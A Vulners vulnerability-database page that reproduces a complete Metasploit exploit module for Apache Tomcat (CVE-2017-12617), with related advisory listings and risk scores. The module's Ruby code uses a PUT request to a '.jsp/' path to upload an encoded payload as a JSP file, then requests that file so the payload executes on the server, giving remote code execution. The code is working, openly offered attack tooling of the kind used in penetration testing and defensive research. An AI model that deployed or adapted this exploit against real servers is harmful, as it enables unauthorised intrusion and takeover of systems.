Lucene search
K

Tomcat RCE via JSP Upload Bypass

🗓️ 09 Oct 2017 01:48:47Reported by peewpwType 
metasploit
 metasploit
🔗 www.rapid7.com👁 143 Views

Tomcat RCE via JSP Upload Bypass. Uses PUT request to bypass and upload JSP shell

Related
Code
ReporterTitlePublishedViews
Family
Gitee
Exploit for Unrestricted Upload of File with Dangerous Type in Apache Tomcat
16 May 202116:14
gitee
Gitee
Exploit for Unrestricted Upload of File with Dangerous Type in Apache Tomcat
27 Apr 202114:33
gitee
Gitee
Exploit for Unrestricted Upload of File with Dangerous Type in Apache Tomcat
6 Jul 202503:24
gitee
Gitee
Exploit for Argument Injection in Phpmailer_Project Phpmailer
5 Dec 201914:28
gitee
Gitee
Exploit for Unrestricted Upload of File with Dangerous Type in Apache Tomcat
22 Oct 202115:45
gitee
IBM Security Bulletins
Security Bulletin: Multiple Security Vulnerabilities in Apache Tomcat affect IBM Rational License Key Server Administration and Reporting Tool
17 Jun 201805:23
ibm
IBM Security Bulletins
Security Bulletin: Multiple security vulnerabilities have been identified in Jazz Reporting Service shipped with Rational Insight (CVE-2017-12615, CVE-2017-12616, CVE-2017-12617)
17 Jun 201805:23
ibm
IBM Security Bulletins
Security Bulletin: Security vulnerabilities in Apache Tomcat affect multiple IBM Rational products based on IBM's Jazz technology
28 Apr 202118:35
ibm
IBM Security Bulletins
Security Bulletin: Rational Build Forge Security Advisory for Apache HTTPD, Apache Tomcat and OpenSSL Upgrade
17 Jun 201805:24
ibm
IBM Security Bulletins
Security Bulletin: WebSphere Message Broker and IBM Integration Bus is affected by Open Source Apache Tomcat Vulnerabilities (CVE-2017-12617,CVE-2017-12615)
23 Mar 202020:41
ibm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Tomcat RCE via JSP Upload Bypass',
        'Description' => %q{
          This module uses a PUT request bypass to upload a jsp shell to a vulnerable Apache Tomcat configuration.
        },
        'Author' => 'peewpw',
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2017-12617' ],
          [ 'URL', 'https://bz.apache.org/bugzilla/show_bug.cgi?id=61542' ],
          [ 'EDB', '42966' ]
        ],
        'Privileged' => false,
        'Platform' => %w[linux win], # others?
        'Targets' => [
          [
            'Automatic',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'win'
            }
          ],
          [
            'Java Windows',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'win'
            }
          ],
          [
            'Java Linux',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'linux'
            }
          ]
        ],
        'DisclosureDate' => '2017-10-03',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'The URI path of the Tomcat installation', '/']),
      Opt::RPORT(8080)
    ])
  end

  def check
    testurl = Rex::Text.rand_text_alpha(10)
    testcontent = Rex::Text.rand_text_alpha(10)

    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
      'method' => 'PUT',
      'data' => "<% out.println(\"#{testcontent}\");%>"
    })

    res1 = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp"),
      'method' => 'GET'
    })

    if res1 && res1.body.include?(testcontent)
      send_request_cgi(
        'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
        'method' => 'DELETE'
      )
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status('Uploading payload...')
    testurl = Rex::Text.rand_text_alpha(10)

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
      'method' => 'PUT',
      'data' => payload.encoded
    })
    if res && res.code == 201
      res1 = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp"),
        'method' => 'GET'
      })
      if res1 && res1.code == 200
        print_status('Payload executed!')
      else
        fail_with(Failure::PayloadFailed, 'Failed to execute the payload')
      end
    else
      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload')
    end
  end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Apr 2022 20:42Current
7.2High risk
Vulners AI Score7.2
CVSS 26.8
CVSS 3.18.1
EPSS0.99988
143